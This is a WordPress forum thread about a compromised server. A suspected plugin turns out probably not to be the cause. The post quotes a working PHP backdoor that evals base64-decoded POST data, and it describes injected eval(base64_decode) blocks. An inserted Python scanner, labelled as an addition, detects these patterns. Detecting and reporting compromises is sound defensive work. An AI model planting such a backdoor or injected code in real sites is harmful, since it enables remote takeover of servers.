Possible security issue in "search and replace" 2.6

  • Hi,

    One of the servers I’m administrating was corrupted. We aren’t exactly sure about what happened yet but here’s what we’ve found:
    – There’s a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    – There’s a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    – There are several plugins installed on this WordPress, including “search and replace”, but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin:

    I just wanted to let you know and see if other users had similar troubles.
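
A defender-side sweep for the two patterns quoted in the post above, as an added example that is not part of the original thread: it counts `eval(base64_decode(` blocks per PHP file and flags the variant that evaluates request data. The function names, the 16-byte "top of file" threshold and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Patterns taken from the two snippets quoted in the post above.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
REQUEST_EVAL = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)


def scan_file(path):
    """Classify one PHP file by the injected-code patterns it contains."""
    data = Path(path).read_bytes()
    hits = [m.start() for m in EVAL_B64.finditer(data)]
    return {
        "blocks": len(hits),
        # Assumed threshold: a hit in the first 16 bytes is a block prepended to the file.
        "at_top": bool(hits) and hits[0] < 16,
        # eval() fed directly from request data is a remote code execution backdoor.
        "backdoor": bool(REQUEST_EVAL.search(data)),
    }


def scan_tree(root):
    """Return {relative path: result} for every .php file with at least one match."""
    root = Path(root)
    results = {p.relative_to(root).as_posix(): scan_file(p) for p in sorted(root.rglob("*.php"))}
    return {name: r for name, r in results.items() if r["blocks"]}


def build_sample_tree(root):
    """Write constructed sample files; the base64 payload is an inert placeholder."""
    root = Path(root)
    inj = b'<?php eval(base64_decode("UExBQ0VIT0xERVI=")); ?>'
    (root / "clean.php").write_bytes(b"<?php echo 'hello'; ?>")
    (root / "index.php").write_bytes(inj + b"<?php echo 'page'; ?>")
    (root / "plugin.php").write_bytes(inj + b"<?php f(); ?>" + inj + b"<?php g(); ?>" + inj)
    (root / "theme.php").write_bytes(
        b'<?php get_header(); ?>\n<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>')
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, result in scan_tree(build_sample_tree(tmp)).items():
            print(name, result)
```

Files reported with `blocks` greater than 1 or with `backdoor` set are the ones that differ from the single prepended block and are worth examining first, together with their modification times.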

Viewing 3 replies - 1 through 3 (of 3 total)
  • Hi
    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?


    We haven’t been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

    Thanks for the update – that’s good to know.

  • The topic ‘Possible security issue in "search and replace" 2.6’ is closed to new replies.